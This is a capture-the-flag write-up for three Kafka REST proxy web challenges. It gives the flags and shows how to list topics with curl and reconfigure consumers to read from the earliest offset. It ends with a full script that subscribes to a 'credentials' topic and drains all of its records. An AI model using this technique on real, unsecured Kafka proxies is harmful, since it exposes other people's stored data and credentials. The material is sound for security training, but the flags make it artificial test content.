write-ups-challenges-2023-2024/serious_business/SOLUTION.md
2023-11-28 16:24:59 +01:00


Metamorphosis solutions

Category

Web

Serious Business 1

Difficulty

Easy, 20 points

Flag

IGCTF{challenge_1_did_you_write_them_all_down!?}

Solution

Every message sent on the topic that the first website listens to contains the flag. It can be viewed directly in the network tab of the browser's developer tools: look for any request whose URL ends in records. The flag sits inside the object in the value field of the returned record.

Challenge 2

Difficulty

Above average, 50 points

Flag

IGCTF{challenge2_in_case_it_wasnt_clear_I_dont_like_meetings}

Solution

Applying the solution from challenge 1 only yields "flag already sent". This implies that we need to look at previously sent messages to get the flag. But let's take a step back first: where are these messages coming from?

The script that runs on the page shows the creation and use of some kind of consumer. If we look closely at the content-type of those requests, we see application/vnd.kafka.v2+json. In other words, we are somehow interacting with Kafka. Kafka itself doesn't expose a REST API, yet that is what the page is using here. A bit of googling should land you on the Confluent REST proxy for Kafka: https://docs.confluent.io/platform/current/kafka-rest/index.html

After learning a bit about Kafka and the REST proxy, we should be able to figure out how to adapt the existing code to read all messages of a topic. To do so, we need to create a Kafka consumer that reads all records on the topic from the beginning (i.e., from the first offset). In the makeConsoomer function, defined in script.js, we can see the following configuration:

```js
let config = {
    name: uuid,
    format: "json",
    "auto.offset.reset": "latest",
}
```

We need to change the auto.offset.reset field to earliest to properly configure the consumer to read out all records on the topic (this sets the consumer offsets to the beginning of the topic).

Challenge 3

Difficulty

Above average, 60 points

Flag

IGCTF{challenge_3_I_forgot_to_take_my_meds}

Solution

There is no mention of a flag in the messages consumed by the third website. We'll need to dig around the Kafka cluster a bit more to find this one. We get an interesting result when we list all topics in the cluster:

```bash
curl <IP>:38082/topics
# ["__confluent.support.metrics","_schemas","credentials","great.ideas","oh.no","stand.back"]
```

There is a topic called credentials here, which seems rather interesting. We need a consumer to subscribe to this topic. In the website's code this is done as follows:

```js
async function subscribe(c) {
    return post(c + "/subscription", {
        topics: [TOPIC]
    })
}
```

If we add the credentials topic to that list and call subscribe, we also get records back from that topic. However, the flag was only published once, so just like with the previous flag, we need to reconfigure our consumer to start reading the topic from the earliest offset.
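The two steps used for challenges 2 and 3 (create a consumer with auto.offset.reset set to earliest, then subscribe it to one or more topics and drain the records) put together as one stand-alone script. This is an added example, not the challenge's script.js or Confluent's code; it talks to the REST proxy v2 endpoints described in the Confluent documentation linked above. The base URL, the consumer group name ctf-readers, the polling limit and the sample records are assumptions made for illustration; the topic names great.ideas and credentials are the ones from the topic listing in challenge 3.

```javascript
// Added example: read every record of the given topics from offset 0 through the
// Kafka REST proxy v2 API. Not the challenge's script.js; names marked as
// assumptions are ours.

const V2_JSON = "application/vnd.kafka.v2+json";        // request/response bodies
const V2_RECORDS = "application/vnd.kafka.json.v2+json"; // Accept header for /records
const FLAG_RE = /IGCTF\{[^}]*\}/g;

// Consumer instance config, as posted to POST /consumers/<group>.
// "earliest" makes a new consumer group start at the first offset of every
// partition; "latest" (the site's default) only yields messages sent after join.
function makeConsumerConfig(name, fromBeginning = true) {
  return {
    name,
    format: "json",
    "auto.offset.reset": fromBeginning ? "earliest" : "latest",
  };
}

// Body for POST <base_uri>/subscription; duplicates removed.
function subscriptionBody(topics) {
  return { topics: Array.from(new Set(topics)) };
}

// Collect distinct IGCTF{...} strings from a batch of records. Values may be
// JSON objects or plain strings, so everything is stringified before matching.
function extractFlags(records) {
  const found = new Set();
  for (const r of records) {
    const text = typeof r.value === "string" ? r.value : JSON.stringify(r.value);
    for (const m of text.matchAll(FLAG_RE)) found.add(m[0]);
  }
  return [...found];
}

// Full exchange: create instance -> subscribe -> poll /records -> delete instance.
// The first polls after subscribing are often empty because partitions have not
// been assigned yet, so we stop only after several consecutive empty batches.
async function readTopicsFromStart(baseUrl, group, topics, { maxEmptyPolls = 3 } = {}) {
  const headers = { "Content-Type": V2_JSON, Accept: V2_JSON };
  const create = await fetch(`${baseUrl}/consumers/${group}`, {
    method: "POST",
    headers,
    body: JSON.stringify(makeConsumerConfig(`reader-${Date.now()}`)),
  });
  if (!create.ok) throw new Error(`create consumer: HTTP ${create.status}`);
  const { base_uri } = await create.json(); // proxy tells us where the instance lives
  try {
    const sub = await fetch(`${base_uri}/subscription`, {
      method: "POST",
      headers,
      body: JSON.stringify(subscriptionBody(topics)),
    });
    if (!sub.ok) throw new Error(`subscribe: HTTP ${sub.status}`);
    const all = [];
    let empty = 0;
    while (empty < maxEmptyPolls) {
      const res = await fetch(`${base_uri}/records`, { headers: { Accept: V2_RECORDS } });
      if (!res.ok) throw new Error(`records: HTTP ${res.status}`);
      const batch = await res.json();
      if (batch.length === 0) {
        empty += 1;
      } else {
        empty = 0;
        all.push(...batch);
      }
    }
    return all;
  } finally {
    // Always remove the instance so the proxy does not keep it around.
    await fetch(base_uri, { method: "DELETE", headers: { "Content-Type": V2_JSON } });
  }
}

// Constructed sample in the shape of a v2 /records response (flag value is made up).
const SAMPLE_RECORDS = [
  { topic: "great.ideas", key: null, value: { msg: "flag already sent" }, partition: 0, offset: 7 },
  { topic: "credentials", key: null, value: { user: "admin", note: "IGCTF{constructed_example_flag}" }, partition: 0, offset: 0 },
  { topic: "oh.no", key: null, value: "plain text IGCTF{constructed_example_flag}", partition: 0, offset: 3 },
];

// Usage (assumption: KAFKA_REST_URL such as http://<IP>:38082); only runs when set.
if (typeof process !== "undefined" && process.env.KAFKA_REST_URL) {
  readTopicsFromStart(process.env.KAFKA_REST_URL, "ctf-readers", ["great.ideas", "credentials"])
    .then((records) => console.log(extractFlags(records)))
    .catch((err) => { console.error(err); process.exitCode = 1; });
}
```

Setting KAFKA_REST_URL runs the exchange end to end; without it the script only defines the helpers, which is how the offset reset, subscription body and flag extraction can be checked offline against the constructed records.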